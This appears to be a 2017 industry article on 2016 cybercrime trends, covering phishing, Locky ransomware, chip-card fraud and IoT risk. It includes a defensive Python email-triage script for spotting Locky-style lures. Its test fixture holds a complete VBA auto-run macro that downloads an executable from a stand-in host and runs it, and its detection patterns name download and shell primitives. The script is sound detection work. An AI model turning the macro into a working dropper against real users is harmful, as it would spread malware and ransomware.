Parsing the Cybersecurity Landscape: 2016 Trends, 2017 Implications

In 2016, cyber-crime against mid-market businesses succeeded, many experts believe, because attackers knew their victims better. Cyber-thieves gained access to mid-market businesses with highly targeted campaigns powered by advanced tools and packaged to mimic familiar business communications. Judging by recent exploits that reaped stratospheric sums and massive caches of personal information, 2017 promises to be another banner year for an increasingly sophisticated criminal class.

Cyber-heists targeting mid-market[1] businesses via phishing and spam became more targeted and technologically advanced in 2016. The implication for this sector in 2017 is that countermeasures must be more coordinated and more technologically comprehensive than ever before to thwart the plethora of cyber-threats inundating mid-market businesses.

Cybersecurity trends and implications were reviewed in detail during the February 2017 webinar "2017 Security Challenges - Are You Prepared?" The XO Communications-sponsored webinar reviewed 2016's top cyber-crime trends, drawn from some 3,000 breaches that occurred over the course of the year. Not surprisingly, many of them hit mid-market businesses.

The impact of these trends for 2017 and beyond can be seen in the wide range of security staffing and budgeting decisions that many mid-market businesses have recently made or are making right now. These decisions reflect a spreading recognition that cyber-crime is growing at viral rates, fueled by smarter cyber-criminals and by easier-to-acquire, largely turnkey tools.

2016 Trends

Last year's top attack vectors were phishing emails, stolen credentials and network vulnerabilities, which enabled incident types including point-of-sale breaches, cyber espionage, web app attacks and more. Criminals launched attacks that were unusually complex and multi-stage. Many of these zero-day, router-hacking, rootkit and watering-hole attacks were combined with credential phishing, old exploits and macro downloaders to steal credentials and spread malware.

On the macro-downloader front, the Locky ransomware, delivered as weaponized MS Office documents attached to email, debuted in early 2016.[2] Locky first struck in February and had already gained popularity by March, when security experts, including Malwarebytes, began evaluating it. The malware is delivered by an Office document carrying malicious macros, or by a JavaScript attachment, sent with a phishing campaign's email message; opening the attachment runs a downloader that fetches the ransomware.

In the Locky campaign, messages from random senders with the subject "ATTN: Invoice J-12345678" delivered an attachment named "invoice_J-12345678.doc."[3] First observed by Proofpoint, the perpetrators appeared to be influenced by, or collaborating with, the actors behind another known criminal operation, Dridex. According to Proofpoint, Locky clearly drew from the Dridex playbook in terms of distribution: just as Dridex had been pushing the limits of campaign sizes, even higher volumes were being seen with Locky, rivaling the largest Dridex campaigns yet observed.[4]
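As an added illustration of what this lure looks like to a mail filter (example code written for this page, not XO's, Proofpoint's or Malwarebytes' tooling), the Python below triages constructed messages that copy the subject and attachment naming above and looks inside Office attachments for the three ingredients of a macro downloader: an auto-run entry point, a download primitive and an execution primitive. The sender addresses, hostnames and macro text are made up; the attachment bodies are plain-text stand-ins for the VBA that a real analyzer would first extract from the OLE container (for example with oletools' olevba), since real .doc macros are stored compressed.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Lure pattern from the campaign: subject "ATTN: Invoice J-12345678" with
# attachment "invoice_J-12345678.doc"; the eight-digit suffix varied per message.
SUBJECT_RE = re.compile(r"^ATTN:\s*Invoice\s+J-\d{8}$", re.IGNORECASE)
LURE_NAME_RE = re.compile(r"^invoice_J-\d{8}\.doc$", re.IGNORECASE)

# Extensions that Windows Script Host runs directly when double-clicked.
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|wsf|vbs)$", re.IGNORECASE)
OFFICE_EXTS = (".doc", ".docm", ".dot", ".xls", ".xlsm")

# A macro downloader needs three things: an entry point that fires on open,
# a way to fetch the payload, and a way to write or run it.
AUTOEXEC_RE = re.compile(rb"\b(AutoOpen|Document_Open|Workbook_Open|AutoExec)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    rb"(URLDownloadToFile|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)",
    re.IGNORECASE)
EXECUTE_RE = re.compile(rb"\b(Shell|WScript\.Shell|CreateObject|powershell|cmd\.exe)\b", re.IGNORECASE)


def score_attachment(name, data):
    """Return the indicators found in one attachment (empty list = nothing suspicious)."""
    reasons = []
    if LURE_NAME_RE.match(name):
        reasons.append("lure-filename")
    if SCRIPT_EXT_RE.search(name):
        reasons.append("script-attachment")
    if name.lower().endswith(OFFICE_EXTS):
        has_autoexec = bool(AUTOEXEC_RE.search(data))
        has_download = bool(DOWNLOAD_RE.search(data))
        has_execute = bool(EXECUTE_RE.search(data))
        if has_autoexec and has_download and has_execute:
            reasons.append("macro-downloader")
        elif has_autoexec:
            reasons.append("autoexec-macro")
    return reasons


def triage(raw_message):
    """Classify one RFC 822 message as allow / quarantine / block and list the reasons."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    reasons = []
    if SUBJECT_RE.match((msg.get("Subject") or "").strip()):
        reasons.append("lure-subject")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        reasons.extend(score_attachment(name, data))
    if "macro-downloader" in reasons or "script-attachment" in reasons:
        verdict = "block"        # runs code on open: do not deliver
    elif reasons:
        verdict = "quarantine"   # matches the lure but no payload seen: hold for review
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons}


def build_message(sender, subject, filename, payload, maintype, subtype):
    """Assemble a constructed test message with one attachment (not a real capture)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "accounts-payable@example.com"
    msg["Subject"] = subject
    msg.set_content("Please find the attached invoice.")
    msg.add_attachment(payload, maintype=maintype, subtype=subtype, filename=filename)
    return msg.as_bytes()


# Constructed stand-in for extracted VBA: auto-run entry point, HTTP fetch, write, execute.
MACRO_DOWNLOADER_VBA = b"""Sub AutoOpen()
    Dim http, stream
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://payload.example/invoice.exe", False
    http.Send
    Set stream = CreateObject("ADODB.Stream")
    stream.Write http.responseBody
    stream.SaveToFile Environ("TEMP") & "\\invoice.exe", 2
    Shell Environ("TEMP") & "\\invoice.exe", 0
End Sub
"""

# Constructed samples: senders and hostnames are invented.
SAMPLES = {
    "locky_lure": build_message("j.ortiz@random-sender.example", "ATTN: Invoice J-12345678",
                                "invoice_J-12345678.doc", MACRO_DOWNLOADER_VBA, "application", "msword"),
    "lure_no_macro": build_message("billing@other-sender.example", "ATTN: Invoice J-20160216",
                                   "invoice_J-20160216.doc", b"Plain document text, no VBA project",
                                   "application", "msword"),
    "js_attachment": build_message("noreply@yet-another.example", "ATTN: Invoice J-31415926",
                                   "invoice_J-31415926.js",
                                   b"var h = new ActiveXObject('MSXML2.XMLHTTP');",
                                   "application", "javascript"),
    "benign": build_message("ar@trusted-supplier.example", "March services invoice",
                            "invoice-2017-03.pdf", b"%PDF-1.4 constructed placeholder",
                            "application", "pdf"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, triage(raw))
```

Note that the subject and filename patterns alone only earn a quarantine: the campaign rotated the eight-digit suffix and the sender, so the durable signal is the macro behaviour, not the lure strings. Macro-enabled attachments from unknown senders should not reach users at all, whether or not a lure rule matches.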

Such cyber-crime collaboration is a major trend that security companies and analysts expect to see growing in 2017 and beyond.

2017 Predictions

Drawing on developments observed in 2016, security experts concur that exploits in 2017 will be increasingly undeterred by new security measures, including EMV chip technology for payment cards. According to TechCrunch and other sources, theft involving chip cards is already being seen, relying largely on the stubborn effectiveness of social engineering and human error. Such theft is possible only where banks and vendors have not correctly implemented the EMV chip card standard.

At the same time, analysts predict growth in risks spawned by the Internet of Things (IoT), with platform-based and ransomware campaigns becoming more targeted and more collaborative. Criminal crews are expected increasingly to join forces to more deeply gouge the growing base of enterprises deploying IoT platforms worldwide. On top of all this, according to XO security partner BAE Systems, the security talent gap will grow to more than one million unfilled jobs over the next four years.

Preparing for the Worst

In so uncertain a climate for mid-market cybersecurity, enterprises are well advised to expect and prepare for the worst. As BAE Systems' Phil Bice advised in XO's February webinar, expert guidance to enterprises needs to include threat sharing, adoption of a cybersecurity framework and continued investment in third-party outsourcing.

Moreover, enterprises may need to rethink traditional management structures when planning and budgeting for improved cybersecurity. In fact, the security function may prove more effective when moved outside the IT organization entirely.

At the end of the day, in many enterprises the CTO works to boost the company's productivity and competitive stature while the CISO strives to quantify and reduce risk. The CIO's mission traditionally is optimizing IT resources. Where in this mix does a laser focus on cybersecurity come from? The upshot for 2017 may be a new desk in many C-suites for dedicated, strategic information-security leadership.


[1] Dun & Bradstreet, 2016: middle-market enterprises are defined as businesses generating between $10 million and $1 billion in revenue.
[2] Malwarebytes Labs, 2016.
[3] Proofpoint, "Dridex Actors Get in the Ransomware Game with 'Locky'," February 2016.